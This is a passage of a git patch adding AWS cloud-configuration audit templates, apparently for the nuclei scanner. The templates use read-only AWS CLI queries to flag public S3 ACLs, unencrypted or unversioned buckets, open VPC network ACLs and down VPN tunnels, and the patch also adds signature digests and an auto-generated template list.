list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-versioning --bucket $bucket --query 'MFADelete' + + matchers: + - type: word + words: + - "null" + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" is not configured to use MFA Delete feature"' diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml new file mode 100644 index 0000000000..328fa9b480 --- /dev/null +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -0,0 +1,49 @@ +id: s3-public-read-acp + +info: + name: S3 Bucket with Public READ_ACP Access + author: princechaddha + severity: critical + description: | + Verifies that Amazon S3 buckets do not permit public 'READ_ACP' (LIST) access to anonymous users, protecting against unauthorized data exposure + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]' + + matchers: + - type: word + words: + - '"Permission": "READ_ACP"' + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" have public READ_ACP access"' diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml new file mode 100644 index 0000000000..d5415890b1 --- /dev/null +++ b/cloud/aws/s3/s3-public-read.yaml @@ -0,0 +1,49 @@ +id: s3-public-read + +info: + name: S3 Bucket with Public READ Access + author: princechaddha + severity: critical + description: | + Verifies that Amazon S3 buckets do not permit public 'READ' (LIST) access to anonymous users, protecting against unauthorized data exposure + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]' + + matchers: + - type: word + words: + - '"Permission": "READ"' + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" have public READ access"' diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml new file mode 100644 index 0000000000..43ba278e3f --- /dev/null +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -0,0 +1,48 @@ +id: s3-public-write-acp +info: + name: S3 Bucket with Public WRITE_ACP Access + author: princechaddha + severity: critical + description: | + Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]' + + matchers: + - type: word + words: + - '"Permission": "WRITE_ACP"' + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" have public WRITE_ACP access"' diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml new file mode 100644 index 0000000000..a97f7b3140 --- /dev/null +++ b/cloud/aws/s3/s3-public-write.yaml @@ -0,0 +1,48 @@ +id: s3-public-write +info: + name: S3 Bucket with Public WRITE Access + author: princechaddha + severity: critical + description: | + Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions. + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`)]' + + matchers: + - type: word + words: + - '"Permission": "WRITE"' + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" have public WRITE access"' diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml new file mode 100644 index 0000000000..0a6c63d355 --- /dev/null +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -0,0 +1,48 @@ +id: s3-server-side-encryption +info: + name: Server-Side Encryption on Amazon S3 Buckets + author: princechaddha + severity: high + description: | + This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS). + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-encryption --bucket $bucket + + matchers: + - type: word + words: + - "ServerSideEncryptionConfigurationNotFoundError" + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" is not encrypted at rest"' diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml new file mode 100644 index 0000000000..4ff725d792 --- /dev/null +++ b/cloud/aws/s3/s3-versioning.yaml @@ -0,0 +1,49 @@ +id: s3-versioning +info: + name: S3 Bucket Versioning not Enabled + author: princechaddha + severity: low + description: | + Verifies that Amazon S3 buckets have object versioning enabled, providing a safeguard for recovering overwritten or deleted objects + reference: + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-versioning --bucket $bucket --query 'Status' + + matchers: + - type: word + words: + - "null" + - "Suspended" + + extractors: + - type: dsl + dsl: + - '"Versioning is not enabled for S3 Bucket " + bucket' diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml new file mode 100644 index 0000000000..b255105a5f --- /dev/null +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -0,0 +1,62 @@ +id: nacl-open-inbound +info: + name: Open Inbound NACL Traffic + author: princechaddha + severity: medium + description: | + Checks for Amazon VPC Network ACLs with inbound rules allowing traffic from all IPs across all ports, increasing the risk of unauthorized access. + impact: | + Allows unrestricted access to resources within the subnet, potentially exposing sensitive data or services to unauthorized users. + remediation: | + Restrict Network ACL inbound rules to only allow necessary IP ranges and ports as per the Principle of Least Privilege. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let NACLIDs of template.nacls){ + set("naclid", NACLIDs) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json + + extractors: + - type: json + name: nacls + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`false`)] | []' + + matchers-condition: and + matchers: + - type: word + words: + - "allow" + condition: and + + - type: word + words: + - "PortRange" + negative: true + + extractors: + - type: dsl + dsl: + - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml new file mode 100644 index 0000000000..717fdc702d --- /dev/null +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -0,0 +1,62 @@ +id: nacl-outbound-restrict +info: + name: Unrestricted NACL Outbound Traffic + author: princechaddha + severity: medium + description: | + Checks for Amazon VPC NACLs allowing outbound traffic to all ports, recommending restriction to necessary ports only. + impact: | + Potential for data exfiltration or unauthorized access if outbound traffic is not properly restricted. + remediation: | + Modify NACL outbound rules to limit traffic to only the ports required for legitimate business needs. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let NACLIDs of template.nacls){ + set("naclid", NACLIDs) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json + + extractors: + - type: json + name: nacls + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`true`)] | []' + + matchers-condition: and + matchers: + - type: word + words: + - "allow" + condition: and + + - type: word + words: + - "PortRange" + negative: true + + extractors: + - type: dsl + dsl: + - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml new file mode 100644 index 0000000000..aca1bddf87 --- /dev/null +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -0,0 +1,55 @@ +id: nat-gateway-use +info: + name: Managed NAT Gateway Usage + author: princechaddha + severity: medium + description: | + Ensure the use of Amazon Managed NAT Gateway for better availability and bandwidth in VPC networks instead of self-managed NAT instances. + impact: | + Using self-managed NAT instances can lead to single points of failure and potential bandwidth bottlenecks. + remediation: | + Replace NAT instances with Amazon Managed NAT Gateway to ensure high availability and scalability in your VPC network. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-nat-gateway.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let VPCIds of template.vpcid){ + set("vpc", VPCIds) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json + + extractors: + - type: json + name: vpcid + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-nat-gateways --region $region --filter "Name=vpc-id,Values=$vpc" "Name=state,Values=available" --query 'NatGateways' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - 'vpc + " VPC is not using Managed NAT Gateways"' diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml new file mode 100644 index 0000000000..7092e81088 --- /dev/null +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -0,0 +1,64 @@ +id: unrestricted-admin-ports +info: + name: Unrestricted Admin Port Access + author: princechaddha + severity: high + description: | + Checks for unrestricted ingress on TCP ports 22 (SSH) and 3389 (RDP) in Amazon VPC NACLs, exposing remote server administration to potentially malicious traffic. + impact: | + Allows unrestricted remote access, increasing the risk of unauthorized access and potential compromise. + remediation: | + Restrict access to ports 22 and 3389 to trusted IPs or IP ranges to adhere to the Principle of Least Privilege (POLP). + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let NACLIDs of template.nacls){ + set("naclid", NACLIDs) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --query 'NetworkAcls[*].NetworkAclId' --output json + + extractors: + - type: json + name: nacls + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-network-acls --region $region --network-acl-ids $naclid --query 'NetworkAcls[*].Entries[?(RuleAction==`allow`) && (Egress==`false`)] | []' --output json + + matchers-condition: and + matchers: + - type: word + words: + - "0.0.0.0/0" + - "CidrBlock" + condition: and + + - type: word + words: + - "22" + - "3389" + condition: or + + extractors: + - type: dsl + dsl: + - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml new file mode 100644 index 0000000000..b11359a0ef --- /dev/null +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -0,0 +1,62 @@ +id: vpc-endpoint-exposed +info: + name: Exposed VPC Endpoint + author: princechaddha + severity: medium + description: | + Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services. + impact: | + Allows unrestricted access to AWS services via the exposed VPC endpoint, potentially leading to data leakage or unauthorized operations. + remediation: | + Update the VPC endpoint's policy to restrict access only to authorized entities and ensure all requests are signed. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let VpcIds of template.VpcId){ + set("vpc", VpcIds) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-vpc-endpoints --region $region --output table --query 'VpcEndpoints[*].VpcEndpointId' --output json + + extractors: + - type: json + name: VpcId + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-vpc-endpoints --region $region --vpc-endpoint-ids $vpc --query 'VpcEndpoints[*].PolicyDocument' --output json + + matchers-condition: and + matchers: + - type: word + words: + - '"AWS": "*"' + - '"Principal": "*"' + + - type: word + words: + - "Condition" + negative: true + + extractors: + - type: dsl + dsl: + - '"VPC endpoints for " + vpc + "are exposed."' diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml new file mode 100644 index 0000000000..6a41cd190e --- /dev/null +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -0,0 +1,55 @@ +id: vpc-endpoints-not-deployed +info: + name: VPC Endpoints Not Deployed + author: princechaddha + severity: medium + description: | + Ensures VPC endpoints are utilized for secure AWS service connectivity without needing an Internet Gateway, enhancing network security and efficiency. + impact: | + Avoids data exposure and reduces bandwidth use by ensuring AWS traffic remains within the AWS network, without public IP requirements for EC2 instances. + remediation: | + Implement VPC endpoints for supported AWS services to secure and optimize connectivity within your VPC, minimizing external access risks. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let VpcIds of template.VpcId){ + set("vpc", VpcIds) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json + + extractors: + - type: json + name: VpcId + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-vpc-endpoints --region $region --filters Name=vpc-id,Values=$vpc --query 'VpcEndpoints[*].VpcEndpointId' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"VPC Endpoints Not Deployed in the VPC network " + vpc' diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml new file mode 100644 index 0000000000..c7f3a24c57 --- /dev/null +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -0,0 +1,57 @@ +id: vpc-flowlogs-not-enabled +info: + name: VPC Flow Logs Not Enabled + author: princechaddha + severity: low + description: | + Ensures Amazon VPC Flow Logs are enabled for tracking network traffic to and from VPCs, aiding in security and troubleshooting. + impact: | + Without VPC Flow Logs, detecting abnormal traffic patterns or breaches becomes difficult, increasing risk of undetected threats. + remediation: | + Enable VPC Flow Logs in the AWS Management Console under the VPC dashboard to collect data on IP traffic going to and from network interfaces in your VPC. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html + tags: cloud,devops,aws,amazon,vpc,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let VpcIds of template.VpcId){ + set("vpc", VpcIds) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json + + extractors: + - type: json + name: VpcId + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-flow-logs --region $region --filter "Name=resource-id,Values=$vpc" + + matchers: + - type: word + words: + - "[]" + condition: and + + + extractors: + - type: dsl + dsl: + - '"Flow Logs feature is not enabled for the VPC " + vpc' diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml new file mode 100644 index 0000000000..5986e7e76d --- /dev/null +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -0,0 +1,55 @@ +id: vpn-tunnel-down +info: + name: AWS VPN Tunnel Down + author: princechaddha + severity: high + description: | + Ensures AWS VPN tunnels are in an UP state, facilitating uninterrupted network traffic through the Virtual Private Network. + impact: | + If a VPN tunnel is DOWN, it could disrupt network connectivity and access to resources in your VPC, impacting business operations. + remediation: | + Monitor VPN tunnel status via the AWS Management Console or CLI. If a tunnel is DOWN, troubleshoot according to AWS documentation and ensure redundancy by configuring multiple tunnels. + reference: + - https://docs.aws.amazon.com/vpn/latest/s2svpn/VPNConnections.html + tags: cloud,devops,aws,amazon,vpn,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let VpnConnectionIds of template.vpnconnactions){ + set("vpnid", VpnConnectionIds) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-vpn-connections --region $region --filters "Name=state,Values=available" --query 'VpnConnections[*].VpnConnectionId' --output json + + extractors: + - type: json + name: vpnconnactions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-vpn-connections --region $region --vpn-connection-ids $vpnid --query 'VpnConnections[*].VgwTelemetry[*].Status[]' + + matchers: + - type: word + words: + - "DOWN" + + extractors: + - type: dsl + dsl: + - 'vpnid + " VPN tunnel is down"' diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml index 8ba021d6db..55fe60e33b 100644 --- a/cloud/enum/aws-app-enum.yaml +++ b/cloud/enum/aws-app-enum.yaml @@ -34,4 +34,5 @@ http: - 200 - 302 condition: or + # digest: 490a0046304402200ead17d9381546ddc9f16663c90d8511969313ccc238f43ffde6040eb1190a3e02204f529c738530581af958cd8d83110cdb30cfc8f14818c8a379fb398f975045f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 03a3a5ba85..202edfdb07 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -29,4 +29,5 @@ dns: part: answer words: - "IN\tA" + # digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 87785a91a7..bad214eb39 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -63,4 +63,5 @@ dns: part: answer words: - "IN\tA" + # digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml index 52e35165b1..c66308e9f5 100644 --- a/cloud/enum/azure-website-enum.yaml +++ b/cloud/enum/azure-website-enum.yaml @@ -34,4 +34,5 @@ http: - 200 - 302 condition: or + # digest: 4a0a0047304502201886de38da3a1bc0e95ff00b7cbf1e6cb0ef6f13197aa042a25d3a4f1ee588ad022100e067b58657d10e3b2d41283022c15120ed1d17f20d58b821418e953bfbfe2b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml index 6fc78a4f32..94dd439803 100644 --- a/cloud/enum/gcp-app-engine-enum.yaml +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -40,4 +40,5 @@ http: - "status_code==302" - contains(location, "login") condition: and + # digest: 490a00463044022049b2ab788a102342c3ee4b36d87315f145c3e963f1bd8389d1b2d9f90540f05402203bb1fa138a4e29c568c6bd421cb97c526e822c25fc952368295259787bc159d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml index ce18ad89d5..545f31d7c1 100644 --- a/cloud/enum/gcp-bucket-enum.yaml +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -37,4 +37,5 @@ http: name: "Protected GCP Bucket" status: - 403 + # digest: 4a0a00473045022038ad1830fc8e77debc4c9fcab4d7eb4c62b9930c3f98860f5e6877c1e72578a4022100e3ea9b5730d32e9219e4716c79b5203733ff802460ee921d0f0c2199ecca7989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml index d8ac9af36c..5387253310 100644 --- a/cloud/enum/gcp-firebase-app-enum.yaml +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -32,4 +32,5 @@ http: name: "Open GCP Firebase App" status: - 200 + # digest: 4a0a0047304502202cb00f1926f91f36e3db3668c74866756cfda2081ea2a15ae99606c13542a8d3022100e57e4412254764ae84c84ff3fbf3932c79895e187f380a33749e25519df189f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml index 6955800564..a99dca6b86 100644 --- a/cloud/enum/gcp-firebase-rtdb-enum.yaml +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -48,4 +48,5 @@ http: name: "Deactivated GCP Firebase RTDB" status: - 423 + # digest: 4b0a00483046022100c5f895d4aa3a88d0917500200d33cf6c779e563a27cfcb1c1849c6740af720b30221009b12087b38af6b723bd3add8f08dd28e76b18133a03396b5d1af3693bfbdcecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/profiles/aws-cloud-config.yml b/profiles/aws-cloud-config.yml new file mode 100644 index 0000000000..c637526139 --- /dev/null +++ b/profiles/aws-cloud-config.yml @@ -0,0 +1,9 @@ +# Nuclei scan profile for scanning aws ACLs + +code: true # enable code templates + +tags: + - aws-cloud-config # filter templates with "aws-cloud-config" tags + +var: + - region=us-east-1 # template input for "region" variable \ No newline at end of file From 27540cb77e1be522c1b41f31476eaba6cec6e910 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Apr 2024 14:23:29 +0000 Subject: [PATCH 0041/1768] Auto Generated New Template Addition List [Thu Apr 11 14:23:29 UTC 2024] :robot: --- .new-additions | 89 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) diff --git a/.new-additions b/.new-additions index 8b0186dd59..f978442b13 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,92 @@ +cloud/aws/acm/acm-cert-expired.yaml +cloud/aws/acm/acm-cert-renewal-30days.yaml +cloud/aws/acm/acm-cert-renewal-45days.yaml +cloud/aws/acm/acm-cert-validation.yaml +cloud/aws/acm/acm-wildcard-cert.yaml +cloud/aws/aws-code-env.yaml +cloud/aws/cloudtrail/cloudtrail-data-events.yaml +cloud/aws/cloudtrail/cloudtrail-disabled.yaml +cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +cloud/aws/cloudwatch/cw-alarm-action-set.yaml +cloud/aws/cloudwatch/cw-alarms-actions.yaml +cloud/aws/ec2/ec2-imdsv2.yaml +cloud/aws/ec2/ec2-public-ip.yaml +cloud/aws/ec2/ec2-sg-egress-open.yaml +cloud/aws/ec2/ec2-sg-ingress.yaml +cloud/aws/ec2/ec2-unrestricted-cifs.yaml +cloud/aws/ec2/ec2-unrestricted-dns.yaml +cloud/aws/ec2/ec2-unrestricted-ftp.yaml +cloud/aws/ec2/ec2-unrestricted-http.yaml +cloud/aws/ec2/ec2-unrestricted-https.yaml +cloud/aws/ec2/ec2-unrestricted-icmp.yaml +cloud/aws/ec2/ec2-unrestricted-memcached.yaml +cloud/aws/ec2/ec2-unrestricted-mongodb.yaml +cloud/aws/ec2/ec2-unrestricted-mssql.yaml +cloud/aws/ec2/ec2-unrestricted-mysql.yaml +cloud/aws/ec2/ec2-unrestricted-netbios.yaml +cloud/aws/ec2/ec2-unrestricted-opensearch.yaml +cloud/aws/ec2/ec2-unrestricted-oracle.yaml +cloud/aws/ec2/ec2-unrestricted-pgsql.yaml +cloud/aws/ec2/ec2-unrestricted-rdp.yaml +cloud/aws/ec2/ec2-unrestricted-redis.yaml +cloud/aws/ec2/ec2-unrestricted-smtp.yaml +cloud/aws/ec2/ec2-unrestricted-ssh.yaml +cloud/aws/ec2/ec2-unrestricted-telnet.yaml +cloud/aws/ec2/publicly-shared-ami.yaml +cloud/aws/ec2/unencrypted-aws-ami.yaml +cloud/aws/iam/iam-access-analyzer.yaml +cloud/aws/iam/iam-expired-ssl.yaml +cloud/aws/iam/iam-full-admin-privileges.yaml +cloud/aws/iam/iam-key-rotation-90days.yaml +cloud/aws/iam/iam-mfa-enable.yaml +cloud/aws/iam/iam-password-policy.yaml +cloud/aws/iam/iam-root-mfa.yaml +cloud/aws/iam/iam-ssh-keys-rotation.yaml +cloud/aws/iam/iam-unapproved-policy.yaml +cloud/aws/iam/iam-user-password-change.yaml +cloud/aws/iam/ssl-cert-renewal.yaml +cloud/aws/rds/aurora-copy-tags-snap.yaml +cloud/aws/rds/aurora-delete-protect.yaml +cloud/aws/rds/iam-db-auth.yaml +cloud/aws/rds/rds-backup-enable.yaml +cloud/aws/rds/rds-deletion-protection.yaml +cloud/aws/rds/rds-encryption-check.yaml +cloud/aws/rds/rds-event-notify.yaml +cloud/aws/rds/rds-event-sub-enable.yaml +cloud/aws/rds/rds-event-sub.yaml +cloud/aws/rds/rds-gp-ssd-usage.yaml +cloud/aws/rds/rds-public-snapshot.yaml +cloud/aws/rds/rds-public-subnet.yaml +cloud/aws/rds/rds-ri-payment-fail.yaml +cloud/aws/rds/rds-snapshot-encryption.yaml +cloud/aws/s3/s3-access-logging.yaml +cloud/aws/s3/s3-auth-fullcontrol.yaml +cloud/aws/s3/s3-bucket-key.yaml +cloud/aws/s3/s3-bucket-policy-public-access.yaml +cloud/aws/s3/s3-mfa-delete-check.yaml +cloud/aws/s3/s3-public-read-acp.yaml +cloud/aws/s3/s3-public-read.yaml +cloud/aws/s3/s3-public-write-acp.yaml +cloud/aws/s3/s3-public-write.yaml +cloud/aws/s3/s3-server-side-encryption.yaml +cloud/aws/s3/s3-versioning.yaml +cloud/aws/vpc/nacl-open-inbound.yaml +cloud/aws/vpc/nacl-outbound-restrict.yaml +cloud/aws/vpc/nat-gateway-usage.yaml +cloud/aws/vpc/unrestricted-admin-ports.yaml +cloud/aws/vpc/vpc-endpoint-exposed.yaml +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +cloud/aws/vpc/vpn-tunnel-down.yaml code/cves/2024/CVE-2024-3094.yaml http/cves/2022/CVE-2022-0424.yaml http/cves/2024/CVE-2024-0337.yaml From b1f909280678f2eafc02b566486bd62161006cd2 Mon Sep 17 